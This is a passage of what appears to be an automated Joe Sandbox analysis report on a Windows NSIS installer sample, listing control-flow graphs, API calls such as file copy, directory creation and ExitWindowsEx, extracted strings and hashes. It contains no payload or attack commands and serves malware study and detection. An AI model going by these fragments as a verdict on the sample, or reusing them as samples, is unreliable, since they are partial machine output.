                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                    • String ID: @rD$New install of "%s" to "%s"${
                                                                    • API String ID: 2110491804-2409696222
                                                                    • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                    • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                    APIs
                                                                    • #17.COMCTL32 ref: 004038A2
                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                    • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                    • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                    • API String ID: 2435955865-239407132
                                                                    • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                    • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                    APIs
                                                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 3581403547-784952888
                                                                    • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                    • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 886 4074bb-4074c0 887 4074c2-4074ef 886->887 888 40752f-407547 886->888 890 4074f1-4074f4 887->890 891 4074f6-4074fa 887->891 889 407aeb-407aff 888->889 895 407b01-407b17 889->895 896 407b19-407b2c 889->896 892 407506-407509 890->892 893 407502 891->893 894 4074fc-407500 891->894 897 407527-40752a 892->897 898 40750b-407514 892->898 893->892 894->892 899 407b33-407b3a 895->899 896->899 902 4076f6-407713 897->902 903 407516 898->903 904 407519-407525 898->904 900 407b61-407c68 899->900 901 407b3c-407b40 899->901 917 407350 900->917 918 407cec 900->918 906 407b46-407b5e 901->906 907 407ccd-407cd4 901->907 909 407715-407729 902->909 910 40772b-40773e 902->910 903->904 905 407589-4075b6 904->905 913 4075d2-4075ec 905->913 914 4075b8-4075d0 905->914 906->900 911 407cdd-407cea 907->911 915 407741-40774b 909->915 910->915 916 407cef-407cf6 911->916 919 4075f0-4075fa 913->919 914->919 920 40774d 915->920 921 4076ee-4076f4 915->921 922 407357-40735b 917->922 923 40749b-4074b6 917->923 924 40746d-407471 917->924 925 4073ff-407403 917->925 918->916 928 407600 919->928 929 407571-407577 919->929 930 407845-4078a1 920->930 931 4076c9-4076cd 920->931 921->902 927 407692-40769c 921->927 922->911 932 407361-40736e 922->932 923->889 937 407c76-407c7d 924->937 938 407477-40748b 924->938 943 407409-407420 925->943 944 407c6d-407c74 925->944 933 4076a2-4076c4 927->933 934 407c9a-407ca1 927->934 946 407556-40756e 928->946 947 407c7f-407c86 928->947 935 40762a-407630 929->935 936 40757d-407583 929->936 930->889 939 407c91-407c98 931->939 940 4076d3-4076eb 931->940 932->918 948 407374-4073ba 932->948 933->930 934->911 949 40768e 935->949 950 407632-40764f 935->950 936->905 936->949 937->911 945 40748e-407496 938->945 939->911 940->921 951 407423-407427 943->951 944->911 945->924 955 407498 945->955 946->929 947->911 953 4073e2-4073e4 948->953 954 4073bc-4073c0 948->954 949->927 956 407651-407665 950->956 957 407667-40767a 950->957 951->925 952 407429-40742f 951->952 959 407431-407438 952->959 960 407459-40746b 952->960 963 4073f5-4073fd 953->963 964 4073e6-4073f3 953->964 961 4073c2-4073c5 GlobalFree 954->961 962 4073cb-4073d9 GlobalAlloc 954->962 955->923 958 40767d-407687 956->958 957->958 958->935 965 407689 958->965 966 407443-407453 GlobalAlloc 959->966 967 40743a-40743d GlobalFree 959->967 960->945 961->962 962->918 968 4073df 962->968 963->951 964->963 964->964 970 407c88-407c8f 965->970 971 40760f-407627 965->971 966->918 966->960 967->966 968->953 970->911 971->935
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                    • String ID:
                                                                    • API String ID: 310444273-0
                                                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                    • ShowWindow.USER32(?), ref: 004054D2
                                                                    • DestroyWindow.USER32 ref: 004054E6
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                    • EnableWindow.USER32(?,?), ref: 00405757
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID: @rD
                                                                    • API String ID: 3282139019-3814967855
                                                                    • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                    • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
